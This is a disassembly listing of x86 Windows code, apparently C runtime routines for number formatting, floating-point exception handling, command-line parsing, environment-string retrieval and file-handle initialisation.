loc_41C773: ; CODE XREF: sub_41C6E1+8E�j
test ebx, ebx
jle short loc_41C7B8
push 1
push edi
call sub_41C8F5
mov al, byte_43B7B0
pop ecx
mov [edi], al
mov esi, [esi+4]
inc edi
pop ecx
test esi, esi
jge short loc_41C7B8
cmp byte_515910, 0
jz short loc_41C79D
neg esi
jmp short loc_41C7A3
; ---------------------------------------------------------------------------
loc_41C79D: ; CODE XREF: sub_41C6E1+B6�j
neg esi
cmp ebx, esi
jl short loc_41C7A5
loc_41C7A3: ; CODE XREF: sub_41C6E1+BA�j
mov ebx, esi
loc_41C7A5: ; CODE XREF: sub_41C6E1+C0�j
push ebx
push edi
call sub_41C8F5
push ebx
push 30h
push edi
call sub_417430
add esp, 14h
loc_41C7B8: ; CODE XREF: sub_41C6E1+94�j
; sub_41C6E1+AD�j
pop edi
mov eax, ebp
pop esi
pop ebp
pop ebx
retn
sub_41C6E1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C7BF proc near ; CODE XREF: sub_41C8A4+34�p
var_14 = qword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
push ecx
push ecx
fld qword ptr [edi]
fstp [esp+14h+var_14]
call sub_41ECF8
mov dword_51590C, eax
mov ecx, [eax+4]
dec ecx
mov ebx, [ebp+arg_8]
mov dword_515914, ecx
xor ecx, ecx
cmp dword ptr [eax], 2Dh
push eax
push ebx
setz cl
add ecx, [ebp+arg_4]
mov esi, ecx
push esi
call sub_41EC81
mov eax, dword_51590C
add esp, 14h
mov ecx, [eax+4]
dec ecx
cmp dword_515914, ecx
setl cl
mov byte_515918, cl
mov eax, [eax+4]
dec eax
cmp eax, 0FFFFFFFCh
mov dword_515914, eax
jl short loc_41C845
cmp eax, ebx
jge short loc_41C845
test cl, cl
jz short loc_41C836
loc_41C82C: ; CODE XREF: sub_41C7BF+72�j
mov al, [esi]
inc esi
test al, al
jnz short loc_41C82C
and [esi-2], al
loc_41C836: ; CODE XREF: sub_41C7BF+6B�j
push ebx
push [ebp+arg_4]
push edi
call sub_41C881
add esp, 0Ch
jmp short loc_41C855
; ---------------------------------------------------------------------------
loc_41C845: ; CODE XREF: sub_41C7BF+63�j
; sub_41C7BF+67�j
push [ebp+arg_C]
push ebx
push [ebp+arg_4]
push edi
call sub_41C85A
add esp, 10h
loc_41C855: ; CODE XREF: sub_41C7BF+84�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41C7BF endp
; =============== S U B R O U T I N E =======================================
sub_41C85A proc near ; CODE XREF: sub_41C7BF+8E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push [esp+arg_C]
mov byte_515910, 1
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_41C5DD
and byte_515910, 0
add esp, 10h
retn
sub_41C85A endp
; =============== S U B R O U T I N E =======================================
sub_41C881 proc near ; CODE XREF: sub_41C7BF+7C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push [esp+arg_8]
mov byte_515910, 1
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_41C6E1
and byte_515910, 0
add esp, 0Ch
retn
sub_41C881 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C8A4 proc near ; CODE XREF: sub_419343+3AA�p
; DATA XREF: sub_418D77�o ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 65h
jz short loc_41C8DF
cmp [ebp+arg_8], 45h
jz short loc_41C8DF
cmp [ebp+arg_8], 66h
jnz short loc_41C8CC
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41C6E1
add esp, 0Ch
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41C8CC: ; CODE XREF: sub_41C8A4+13�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41C7BF
jmp short loc_41C8F0
; ---------------------------------------------------------------------------
loc_41C8DF: ; CODE XREF: sub_41C8A4+7�j
; sub_41C8A4+D�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41C5DD
loc_41C8F0: ; CODE XREF: sub_41C8A4+39�j
add esp, 10h
pop ebp
retn
sub_41C8A4 endp
; =============== S U B R O U T I N E =======================================
sub_41C8F5 proc near ; CODE XREF: sub_41C5DD+2C�p
; sub_41C6E1+83�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push edi
mov edi, [esp+4+arg_4]
test edi, edi
jz short loc_41C918
push esi
mov esi, [esp+8+arg_0]
push esi
call sub_417AF0
inc eax
push eax
push esi
add esi, edi
push esi
call sub_41D840
add esp, 10h
pop esi
loc_41C918: ; CODE XREF: sub_41C8F5+7�j
pop edi
retn
sub_41C8F5 endp
; =============== S U B R O U T I N E =======================================
sub_41C91A proc near ; CODE XREF: sub_418DAF+16�p
; sub_41906C+1D�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
xor edx, edx
mov dword_515888, ecx
mov eax, offset dword_43B8E0
loc_41C92B: ; CODE XREF: sub_41C91A+1E�j
cmp ecx, [eax]
jz short loc_41C94F
add eax, 8
inc edx
cmp eax, offset dword_43BA48
jl short loc_41C92B
cmp ecx, 13h
jb short loc_41C95C
cmp ecx, 24h
ja short loc_41C95C
mov dword_515884, 0Dh
retn
; ---------------------------------------------------------------------------
loc_41C94F: ; CODE XREF: sub_41C91A+13�j
mov eax, dword_43B8E4[edx*8]
mov dword_515884, eax
retn
; ---------------------------------------------------------------------------
loc_41C95C: ; CODE XREF: sub_41C91A+23�j
; sub_41C91A+28�j
cmp ecx, 0BCh
jb short loc_41C976
cmp ecx, 0CAh
mov dword_515884, 8
jbe short locret_41C980
loc_41C976: ; CODE XREF: sub_41C91A+48�j
mov dword_515884, 16h
locret_41C980: ; CODE XREF: sub_41C91A+5A�j
retn
sub_41C91A endp
; =============== S U B R O U T I N E =======================================
sub_41C981 proc near ; CODE XREF: sub_419096+8�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push dword ptr [esi+10h]
call sub_41D5AC
test eax, eax
pop ecx
jz short loc_41CA0A
cmp esi, offset dword_43BB98
jnz short loc_41C99F
xor eax, eax
jmp short loc_41C9AA
; ---------------------------------------------------------------------------
loc_41C99F: ; CODE XREF: sub_41C981+18�j
cmp esi, offset dword_43BBB8
jnz short loc_41CA0A
push 1
pop eax
loc_41C9AA: ; CODE XREF: sub_41C981+1C�j
inc dword_515A34
test word ptr [esi+0Ch], 10Ch
jnz short loc_41CA0A
cmp dword_51591C[eax*4], 0
push ebx
push edi
lea edi, ds:51591Ch[eax*4]
mov ebx, 1000h
jnz short loc_41C9F0
push ebx
call sub_417BEE
test eax, eax
pop ecx
mov [edi], eax
jnz short loc_41C9F0
lea eax, [esi+14h]
push 2
mov [esi+8], eax
mov [esi], eax
pop eax
mov [esi+18h], eax
mov [esi+4], eax
jmp short loc_41C9FD
; ---------------------------------------------------------------------------
loc_41C9F0: ; CODE XREF: sub_41C981+4D�j
; sub_41C981+5A�j
mov edi, [edi]
mov [esi+18h], ebx
mov [esi+8], edi
mov [esi], edi
mov [esi+4], ebx
loc_41C9FD: ; CODE XREF: sub_41C981+6D�j
or word ptr [esi+0Ch], 1102h
push 1
pop eax
pop edi
pop ebx
pop esi
retn
; ---------------------------------------------------------------------------
loc_41CA0A: ; CODE XREF: sub_41C981+10�j
; sub_41C981+24�j ...
xor eax, eax
pop esi
retn
sub_41C981 endp
; =============== S U B R O U T I N E =======================================
sub_41CA0E proc near ; CODE XREF: sub_419096+24�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0
push esi
jz short loc_41CA38
mov esi, [esp+4+arg_4]
test byte ptr [esi+0Dh], 10h
jz short loc_41CA49
push esi
call sub_41B4B0
and byte ptr [esi+0Dh], 0EEh
and dword ptr [esi+18h], 0
and dword ptr [esi], 0
and dword ptr [esi+8], 0
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_41CA38: ; CODE XREF: sub_41CA0E+6�j
mov eax, [esp+4+arg_4]
test byte ptr [eax+0Dh], 10h
jz short loc_41CA49
push eax
call sub_41B4B0
pop ecx
loc_41CA49: ; CODE XREF: sub_41CA0E+10�j
; sub_41CA0E+32�j
pop esi
retn
sub_41CA0E endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
push dword ptr [ebp+8]
call sub_41CB8C
test eax, eax
pop ecx
jz loc_41CB80
mov ebx, [eax+8]
test ebx, ebx
jz loc_41CB80
cmp ebx, 5
jnz short loc_41CA7C
and dword ptr [eax+8], 0
push 1
pop eax
jmp loc_41CB89
; ---------------------------------------------------------------------------
loc_41CA7C: ; CODE XREF: ___:0041CA6E�j
cmp ebx, 1
jz loc_41CB7B
mov ecx, dword_515924
mov [ebp+8], ecx
mov ecx, [ebp+0Ch]
mov dword_515924, ecx
mov ecx, [eax+4]
cmp ecx, 8
jnz loc_41CB6B
mov ecx, dword_43BAC0
mov edx, dword_43BAC4
add edx, ecx
push esi
cmp ecx, edx
jge short loc_41CACB
lea esi, [ecx+ecx*2]
sub edx, ecx
lea esi, ds:43BA50h[esi*4]
loc_41CAC2: ; CODE XREF: ___:0041CAC9�j
and dword ptr [esi], 0
add esi, 0Ch
dec edx
jnz short loc_41CAC2
loc_41CACB: ; CODE XREF: ___:0041CAB4�j
mov eax, [eax]
mov esi, dword_43BACC
cmp eax, 0C000008Eh
jnz short loc_41CAE6
mov dword_43BACC, 83h
jmp short loc_41CB56
; ---------------------------------------------------------------------------
loc_41CAE6: ; CODE XREF: ___:0041CAD8�j
cmp eax, 0C0000090h
jnz short loc_41CAF9
mov dword_43BACC, 81h
jmp short loc_41CB56
; ---------------------------------------------------------------------------
loc_41CAF9: ; CODE XREF: ___:0041CAEB�j
cmp eax, 0C0000091h
jnz short loc_41CB0C
mov dword_43BACC, 84h
jmp short loc_41CB56
; ---------------------------------------------------------------------------
loc_41CB0C: ; CODE XREF: ___:0041CAFE�j
cmp eax, 0C0000093h
jnz short loc_41CB1F
mov dword_43BACC, 85h
jmp short loc_41CB56
; ---------------------------------------------------------------------------
loc_41CB1F: ; CODE XREF: ___:0041CB11�j
cmp eax, 0C000008Dh
jnz short loc_41CB32
mov dword_43BACC, 82h
jmp short loc_41CB56
; ---------------------------------------------------------------------------
loc_41CB32: ; CODE XREF: ___:0041CB24�j
cmp eax, 0C000008Fh
jnz short loc_41CB45
mov dword_43BACC, 86h
jmp short loc_41CB56
; ---------------------------------------------------------------------------
loc_41CB45: ; CODE XREF: ___:0041CB37�j
cmp eax, 0C0000092h
jnz short loc_41CB56
mov dword_43BACC, 8Ah
loc_41CB56: ; CODE XREF: ___:0041CAE4�j
; ___:0041CAF7�j ...
push dword_43BACC
push 8
call ebx
pop ecx
mov dword_43BACC, esi
pop ecx
pop esi
jmp short loc_41CB73
; ---------------------------------------------------------------------------
loc_41CB6B: ; CODE XREF: ___:0041CA9D�j
and dword ptr [eax+8], 0
push ecx
call ebx
pop ecx
loc_41CB73: ; CODE XREF: ___:0041CB69�j
mov eax, [ebp+8]
mov dword_515924, eax
loc_41CB7B: ; CODE XREF: ___:0041CA7F�j
or eax, 0FFFFFFFFh
jmp short loc_41CB89
; ---------------------------------------------------------------------------
loc_41CB80: ; CODE XREF: ___:0041CA5A�j
; ___:0041CA65�j
push dword ptr [ebp+0Ch]
nop
call near ptr 7C862E2Ah
loc_41CB89: ; CODE XREF: ___:0041CA77�j
; ___:0041CB7E�j
pop ebx
pop ebp
retn
; =============== S U B R O U T I N E =======================================
sub_41CB8C proc near ; CODE XREF: ___:0041CA52�p
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
mov ecx, dword_43BAC8
cmp dword_43BA48, edx
push esi
mov eax, offset dword_43BA48
jz short loc_41CBB9
lea esi, [ecx+ecx*2]
lea esi, ds:43BA48h[esi*4]
loc_41CBAE: ; CODE XREF: sub_41CB8C+2B�j
add eax, 0Ch
cmp eax, esi
jnb short loc_41CBB9
cmp [eax], edx
jnz short loc_41CBAE
loc_41CBB9: ; CODE XREF: sub_41CB8C+16�j
; sub_41CB8C+27�j
lea ecx, [ecx+ecx*2]
pop esi
lea ecx, ds:43BA48h[ecx*4]
cmp eax, ecx
jnb short loc_41CBCC
cmp [eax], edx
jz short locret_41CBCE
loc_41CBCC: ; CODE XREF: sub_41CB8C+3A�j
xor eax, eax
locret_41CBCE: ; CODE XREF: sub_41CB8C+3E�j
retn
sub_41CB8C endp
; ---------------------------------------------------------------------------
cmp dword_516ECC, 0
jnz short loc_41CBDD
call sub_41C3C0
loc_41CBDD: ; CODE XREF: ___:0041CBD6�j
push esi
mov esi, dword_516EC4
mov al, [esi]
cmp al, 22h
jnz short loc_41CC0F
loc_41CBEA: ; CODE XREF: ___:0041CC02�j
; ___:0041CC05�j
mov al, [esi+1]
inc esi
cmp al, 22h
jz short loc_41CC07
test al, al
jz short loc_41CC07
movzx eax, al
push eax
call sub_41EE1B
test eax, eax
pop ecx
jz short loc_41CBEA
inc esi
jmp short loc_41CBEA
; ---------------------------------------------------------------------------
loc_41CC07: ; CODE XREF: ___:0041CBF0�j
; ___:0041CBF4�j
cmp byte ptr [esi], 22h
jnz short loc_41CC19
loc_41CC0C: ; CODE XREF: ___:0041CC21�j
inc esi
jmp short loc_41CC19
; ---------------------------------------------------------------------------
loc_41CC0F: ; CODE XREF: ___:0041CBE8�j
cmp al, 20h
jbe short loc_41CC19
loc_41CC13: ; CODE XREF: ___:0041CC17�j
inc esi
cmp byte ptr [esi], 20h
ja short loc_41CC13
loc_41CC19: ; CODE XREF: ___:0041CC0A�j
; ___:0041CC0D�j ...
mov al, [esi]
test al, al
jz short loc_41CC23
cmp al, 20h
jbe short loc_41CC0C
loc_41CC23: ; CODE XREF: ___:0041CC1D�j
mov eax, esi
pop esi
retn
; ---------------------------------------------------------------------------
push ebx
xor ebx, ebx
cmp dword_516ECC, ebx
push esi
push edi
jnz short loc_41CC39
call sub_41C3C0
loc_41CC39: ; CODE XREF: ___:0041CC32�j
mov esi, dword_5158D0
xor edi, edi
loc_41CC41: ; CODE XREF: ___:0041CC57�j
mov al, [esi]
cmp al, bl
jz short loc_41CC59
cmp al, 3Dh
jz short loc_41CC4C
inc edi
loc_41CC4C: ; CODE XREF: ___:0041CC49�j
push esi
call sub_417AF0
pop ecx
lea esi, [esi+eax+1]
jmp short loc_41CC41
; ---------------------------------------------------------------------------
loc_41CC59: ; CODE XREF: ___:0041CC45�j
lea eax, ds:4[edi*4]
push eax
call sub_417BEE
mov esi, eax
pop ecx
cmp esi, ebx
mov dword_5158AC, esi
jnz short loc_41CC7B
push 9
call sub_4191E5
pop ecx
loc_41CC7B: ; CODE XREF: ___:0041CC71�j
mov edi, dword_5158D0
cmp [edi], bl
jz short loc_41CCBE
push ebp
loc_41CC86: ; CODE XREF: ___:0041CCBB�j
push edi
call sub_417AF0
mov ebp, eax
pop ecx
inc ebp
cmp byte ptr [edi], 3Dh
jz short loc_41CCB7
push ebp
call sub_417BEE
cmp eax, ebx
pop ecx
mov [esi], eax
jnz short loc_41CCAA
push 9
call sub_4191E5
pop ecx
loc_41CCAA: ; CODE XREF: ___:0041CCA0�j
push edi
push dword ptr [esi]
call sub_417A00
pop ecx
add esi, 4
pop ecx
loc_41CCB7: ; CODE XREF: ___:0041CC93�j
add edi, ebp
cmp [edi], bl
jnz short loc_41CC86
pop ebp
loc_41CCBE: ; CODE XREF: ___:0041CC83�j
push dword_5158D0
call sub_417C62
pop ecx
mov dword_5158D0, ebx
mov [esi], ebx
pop edi
pop esi
mov dword_516EC8, 1
pop ebx
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
xor ebx, ebx
cmp dword_516ECC, ebx
push esi
push edi
jnz short loc_41CCF7
call sub_41C3C0
loc_41CCF7: ; CODE XREF: ___:0041CCF0�j
mov esi, offset dword_515928
push 104h
push esi
push ebx
nop
call near ptr 7C80B4CFh
mov eax, dword_516EC4
mov dword_5158BC, esi
mov edi, esi
cmp [eax], bl
jz short loc_41CD1C
mov edi, eax
loc_41CD1C: ; CODE XREF: ___:0041CD18�j
lea eax, [ebp-8]
push eax
lea eax, [ebp-4]
push eax
push ebx
push ebx
push edi
call sub_41CD79
mov eax, [ebp-8]
mov ecx, [ebp-4]
lea eax, [eax+ecx*4]
push eax
call sub_417BEE
mov esi, eax
add esp, 18h
cmp esi, ebx
jnz short loc_41CD4C
push 8
call sub_4191E5
pop ecx
loc_41CD4C: ; CODE XREF: ___:0041CD42�j
lea eax, [ebp-8]
push eax
lea eax, [ebp-4]
push eax
mov eax, [ebp-4]
lea eax, [esi+eax*4]
push eax
push esi
push edi
call sub_41CD79
mov eax, [ebp-4]
add esp, 14h
dec eax
mov dword_5158A4, esi
pop edi
pop esi
mov dword_5158A0, eax
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CD79 proc near ; CODE XREF: ___:0041CD27�p
; ___:0041CD5D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_10]
mov eax, [ebp+arg_C]
push ebx
push esi
and dword ptr [ecx], 0
mov esi, [ebp+arg_8]
push edi
mov edi, [ebp+arg_4]
mov dword ptr [eax], 1
mov eax, [ebp+arg_0]
test edi, edi
jz short loc_41CDA3
mov [edi], esi
add edi, 4
mov [ebp+arg_4], edi
loc_41CDA3: ; CODE XREF: sub_41CD79+20�j
cmp byte ptr [eax], 22h
jnz short loc_41CDEC
loc_41CDA8: ; CODE XREF: sub_41CD79+58�j
; sub_41CD79+5F�j
mov dl, [eax+1]
inc eax
cmp dl, 22h
jz short loc_41CDDA
test dl, dl
jz short loc_41CDDA
movzx edx, dl
test byte_516DA1[edx], 4
jz short loc_41CDCD
inc dword ptr [ecx]
test esi, esi
jz short loc_41CDCD
mov dl, [eax]
mov [esi], dl
inc esi
inc eax
loc_41CDCD: ; CODE XREF: sub_41CD79+46�j
; sub_41CD79+4C�j
inc dword ptr [ecx]
test esi, esi
jz short loc_41CDA8
mov dl, [eax]
mov [esi], dl
inc esi
jmp short loc_41CDA8
; ---------------------------------------------------------------------------
loc_41CDDA: ; CODE XREF: sub_41CD79+36�j
; sub_41CD79+3A�j
inc dword ptr [ecx]
test esi, esi
jz short loc_41CDE4
and byte ptr [esi], 0
inc esi
loc_41CDE4: ; CODE XREF: sub_41CD79+65�j
cmp byte ptr [eax], 22h
jnz short loc_41CE2F
inc eax
jmp short loc_41CE2F
; ---------------------------------------------------------------------------
loc_41CDEC: ; CODE XREF: sub_41CD79+2D�j
; sub_41CD79+A5�j
inc dword ptr [ecx]
test esi, esi
jz short loc_41CDF7
mov dl, [eax]
mov [esi], dl
inc esi
loc_41CDF7: ; CODE XREF: sub_41CD79+77�j
mov dl, [eax]
inc eax
movzx ebx, dl
test byte_516DA1[ebx], 4
jz short loc_41CE12
inc dword ptr [ecx]
test esi, esi
jz short loc_41CE11
mov bl, [eax]
mov [esi], bl
inc esi
loc_41CE11: ; CODE XREF: sub_41CD79+91�j
inc eax
loc_41CE12: ; CODE XREF: sub_41CD79+8B�j
cmp dl, 20h
jz short loc_41CE20
test dl, dl
jz short loc_41CE24
cmp dl, 9
jnz short loc_41CDEC
loc_41CE20: ; CODE XREF: sub_41CD79+9C�j
test dl, dl
jnz short loc_41CE27
loc_41CE24: ; CODE XREF: sub_41CD79+A0�j
dec eax
jmp short loc_41CE2F
; ---------------------------------------------------------------------------
loc_41CE27: ; CODE XREF: sub_41CD79+A9�j
test esi, esi
jz short loc_41CE2F
and byte ptr [esi-1], 0
loc_41CE2F: ; CODE XREF: sub_41CD79+6E�j
; sub_41CD79+71�j ...
and [ebp+arg_10], 0
loc_41CE33: ; CODE XREF: sub_41CD79+19E�j
cmp byte ptr [eax], 0
jz loc_41CF1C
loc_41CE3C: ; CODE XREF: sub_41CD79+D0�j
mov dl, [eax]
cmp dl, 20h
jz short loc_41CE48
cmp dl, 9
jnz short loc_41CE4B
loc_41CE48: ; CODE XREF: sub_41CD79+C8�j
inc eax
jmp short loc_41CE3C
; ---------------------------------------------------------------------------
loc_41CE4B: ; CODE XREF: sub_41CD79+CD�j
cmp byte ptr [eax], 0
jz loc_41CF1C
test edi, edi
jz short loc_41CE60
mov [edi], esi
add edi, 4
mov [ebp+arg_4], edi
loc_41CE60: ; CODE XREF: sub_41CD79+DD�j
mov edx, [ebp+arg_C]
inc dword ptr [edx]
loc_41CE65: ; CODE XREF: sub_41CD79+18F�j
mov [ebp+arg_0], 1
xor ebx, ebx
loc_41CE6E: ; CODE XREF: sub_41CD79+FC�j
cmp byte ptr [eax], 5Ch
jnz short loc_41CE77
inc eax
inc ebx
jmp short loc_41CE6E
; ---------------------------------------------------------------------------
loc_41CE77: ; CODE XREF: sub_41CD79+F8�j
cmp byte ptr [eax], 22h
jnz short loc_41CEA8
test bl, 1
jnz short loc_41CEA6
xor edi, edi
cmp [ebp+arg_10], edi
jz short loc_41CE95
cmp byte ptr [eax+1], 22h
lea edx, [eax+1]
jnz short loc_41CE95
mov eax, edx
jmp short loc_41CE98
; ---------------------------------------------------------------------------
loc_41CE95: ; CODE XREF: sub_41CD79+10D�j
; sub_41CD79+116�j
mov [ebp+arg_0], edi
loc_41CE98: ; CODE XREF: sub_41CD79+11A�j
mov edi, [ebp+arg_4]
xor edx, edx
cmp [ebp+arg_10], edx
setz dl
mov [ebp+arg_10], edx
loc_41CEA6: ; CODE XREF: sub_41CD79+106�j
shr ebx, 1
loc_41CEA8: ; CODE XREF: sub_41CD79+101�j
mov edx, ebx
dec ebx
test edx, edx
jz short loc_41CEBD
inc ebx
loc_41CEB0: ; CODE XREF: sub_41CD79+142�j
test esi, esi
jz short loc_41CEB8
mov byte ptr [esi], 5Ch
inc esi
loc_41CEB8: ; CODE XREF: sub_41CD79+139�j
inc dword ptr [ecx]
dec ebx
jnz short loc_41CEB0
loc_41CEBD: ; CODE XREF: sub_41CD79+134�j
mov dl, [eax]
test dl, dl
jz short loc_41CF0D
cmp [ebp+arg_10], 0
jnz short loc_41CED3
cmp dl, 20h
jz short loc_41CF0D
cmp dl, 9
jz short loc_41CF0D
loc_41CED3: ; CODE XREF: sub_41CD79+14E�j
cmp [ebp+arg_0], 0
jz short loc_41CF07
test esi, esi
jz short loc_41CEF6
movzx ebx, dl
test byte_516DA1[ebx], 4
jz short loc_41CEEF
mov [esi], dl
inc esi
inc eax
inc dword ptr [ecx]
loc_41CEEF: ; CODE XREF: sub_41CD79+16E�j
mov dl, [eax]
mov [esi], dl
inc esi
jmp short loc_41CF05
; ---------------------------------------------------------------------------
loc_41CEF6: ; CODE XREF: sub_41CD79+162�j
movzx edx, dl
test byte_516DA1[edx], 4
jz short loc_41CF05
inc eax
inc dword ptr [ecx]
loc_41CF05: ; CODE XREF: sub_41CD79+17B�j
; sub_41CD79+187�j
inc dword ptr [ecx]
loc_41CF07: ; CODE XREF: sub_41CD79+15E�j
inc eax
jmp loc_41CE65
; ---------------------------------------------------------------------------
loc_41CF0D: ; CODE XREF: sub_41CD79+148�j
; sub_41CD79+153�j ...
test esi, esi
jz short loc_41CF15
and byte ptr [esi], 0
inc esi
loc_41CF15: ; CODE XREF: sub_41CD79+196�j
inc dword ptr [ecx]
jmp loc_41CE33
; ---------------------------------------------------------------------------
loc_41CF1C: ; CODE XREF: sub_41CD79+BD�j
; sub_41CD79+D5�j
test edi, edi
jz short loc_41CF23
and dword ptr [edi], 0
loc_41CF23: ; CODE XREF: sub_41CD79+1A5�j
mov eax, [ebp+arg_C]
pop edi
pop esi
pop ebx
inc dword ptr [eax]
pop ebp
retn
sub_41CD79 endp
; ---------------------------------------------------------------------------
push ecx
push ecx
mov eax, dword_515A2C
push ebx
push ebp
mov ebp, dword_421034
push esi
push edi
xor ebx, ebx
xor esi, esi
xor edi, edi
cmp eax, ebx
jnz short loc_41CF7B
call ebp ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz short loc_41CF5C
mov dword_515A2C, 1
jmp short loc_41CF84
; ---------------------------------------------------------------------------
loc_41CF5C: ; CODE XREF: ___:0041CF4E�j
nop
call near ptr 7C81CF5Bh
mov edi, eax
cmp edi, ebx
jz loc_41D056
mov dword_515A2C, 2
jmp loc_41D00A
; ---------------------------------------------------------------------------
loc_41CF7B: ; CODE XREF: ___:0041CF46�j
cmp eax, 1
jnz loc_41D005
loc_41CF84: ; CODE XREF: ___:0041CF5A�j
cmp esi, ebx
jnz short loc_41CF94
call ebp ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz loc_41D056
loc_41CF94: ; CODE XREF: ___:0041CF86�j
cmp [esi], bx
mov eax, esi
jz short loc_41CFA9
loc_41CF9B: ; CODE XREF: ___:0041CFA0�j
; ___:0041CFA7�j
inc eax
inc eax
cmp [eax], bx
jnz short loc_41CF9B
inc eax
inc eax
cmp [eax], bx
jnz short loc_41CF9B
loc_41CFA9: ; CODE XREF: ___:0041CF99�j
sub eax, esi
mov edi, dword_421158
sar eax, 1
push ebx
push ebx
inc eax
push ebx
push ebx
push eax
push esi
push ebx
push ebx
mov [esp+34h], eax
call edi ; WideCharToMultiByte
mov ebp, eax
cmp ebp, ebx
jz short loc_41CFFA
push ebp
call sub_417BEE
cmp eax, ebx
pop ecx
mov [esp+10h], eax
jz short loc_41CFFA
push ebx
push ebx
push ebp
push eax
push dword ptr [esp+24h]
push esi
push ebx
push ebx
call edi ; WideCharToMultiByte
test eax, eax
jnz short loc_41CFF6
push dword ptr [esp+10h]
call sub_417C62
pop ecx
mov [esp+10h], ebx
loc_41CFF6: ; CODE XREF: ___:0041CFE6�j
mov ebx, [esp+10h]
loc_41CFFA: ; CODE XREF: ___:0041CFC6�j
; ___:0041CFD5�j
push esi
nop
call near ptr 7C814AE7h
mov eax, ebx
jmp short loc_41D058
; ---------------------------------------------------------------------------
loc_41D005: ; CODE XREF: ___:0041CF7E�j
cmp eax, 2
jnz short loc_41D056
loc_41D00A: ; CODE XREF: ___:0041CF76�j
cmp edi, ebx
jnz short loc_41D01A
nop
call near ptr 7C81CF5Bh
mov edi, eax
cmp edi, ebx
jz short loc_41D056
loc_41D01A: ; CODE XREF: ___:0041D00C�j
cmp [edi], bl
mov eax, edi
jz short loc_41D02A
loc_41D020: ; CODE XREF: ___:0041D023�j
; ___:0041D028�j
inc eax
cmp [eax], bl
jnz short loc_41D020
inc eax
cmp [eax], bl
jnz short loc_41D020
loc_41D02A: ; CODE XREF: ___:0041D01E�j
sub eax, edi
inc eax
mov ebp, eax
push ebp
call sub_417BEE
mov esi, eax
pop ecx
cmp esi, ebx
jnz short loc_41D040
xor esi, esi
jmp short loc_41D04B
; ---------------------------------------------------------------------------
loc_41D040: ; CODE XREF: ___:0041D03A�j
push ebp
push edi
push esi
call sub_417490
add esp, 0Ch
loc_41D04B: ; CODE XREF: ___:0041D03E�j
push edi
nop
call near ptr 7C81DF77h
mov eax, esi
jmp short loc_41D058
; ---------------------------------------------------------------------------
loc_41D056: ; CODE XREF: ___:0041CF66�j
; ___:0041CF8E�j ...
xor eax, eax
loc_41D058: ; CODE XREF: ___:0041D003�j
; ___:0041D054�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
sub esp, 44h
push ebx
push ebp
push esi
push edi
push 100h
call sub_417BEE
mov esi, eax
pop ecx
test esi, esi
jnz short loc_41D07F
push 1Bh
call sub_4191E5
pop ecx
loc_41D07F: ; CODE XREF: ___:0041D075�j
mov dword_516B80, esi
mov dword_516C80, 20h
lea eax, [esi+100h]
loc_41D095: ; CODE XREF: ___:0041D0B1�j
cmp esi, eax
jnb short loc_41D0B3
and byte ptr [esi+4], 0
or dword ptr [esi], 0FFFFFFFFh
mov byte ptr [esi+5], 0Ah
mov eax, dword_516B80
add esi, 8
add eax, 100h
jmp short loc_41D095
; ---------------------------------------------------------------------------
loc_41D0B3: ; CODE XREF: ___:0041D097�j
lea eax, [esp+10h]
push eax
nop
call near ptr 7C801EEEh
cmp word ptr [esp+42h], 0
jz loc_41D18F
mov eax, [esp+44h]
test eax, eax
jz loc_41D18F
mov esi, [eax]
lea ebp, [eax+4]
mov eax, 800h
cmp esi, eax
lea ebx, [esi+ebp]
jl short loc_41D0E9
mov esi, eax
loc_41D0E9: ; CODE XREF: ___:0041D0E5�j
cmp dword_516C80, esi
jge short loc_41D143
mov edi, offset dword_516B84
loc_41D0F6: ; CODE XREF: ___:0041D139�j
push 100h
call sub_417BEE
test eax, eax
pop ecx
jz short loc_41D13D
add dword_516C80, 20h
mov [edi], eax
lea ecx, [eax+100h]
loc_41D114: ; CODE XREF: ___:0041D12E�j
cmp eax, ecx
jnb short loc_41D130
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+5], 0Ah
mov ecx, [edi]
add eax, 8
add ecx, 100h
jmp short loc_41D114
; ---------------------------------------------------------------------------
loc_41D130: ; CODE XREF: ___:0041D116�j
add edi, 4
cmp dword_516C80, esi
jl short loc_41D0F6
jmp short loc_41D143
; ---------------------------------------------------------------------------
